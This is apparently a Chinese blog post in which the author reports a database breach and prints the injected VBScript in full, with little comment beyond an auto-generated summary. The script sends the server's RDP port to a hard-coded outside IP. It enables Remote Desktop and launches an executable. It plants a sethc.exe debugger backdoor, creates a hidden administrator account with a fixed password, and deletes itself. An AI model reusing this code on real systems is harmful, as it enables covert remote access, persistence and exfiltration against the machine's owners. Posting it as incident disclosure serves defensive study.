数据库被入侵了,被注入的脚步如下

本文分析了一段使用VBScript编写的恶意脚本,该脚本尝试修改注册表设置、启动远程桌面服务并执行一系列系统操作。此外,还展示了如何创建用户及更改密码等操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

on error resume next
Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then 
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if

Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0 
xPost.Send() 


set obj=wscript.createObject("wscript.shell") 
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide



Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"





Set o=CreateObject("Shell.Users")
Set z=o.create("winhelp")
z.changePassword "85760042aa!@#",""
z.setting("AccountType")=3

Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值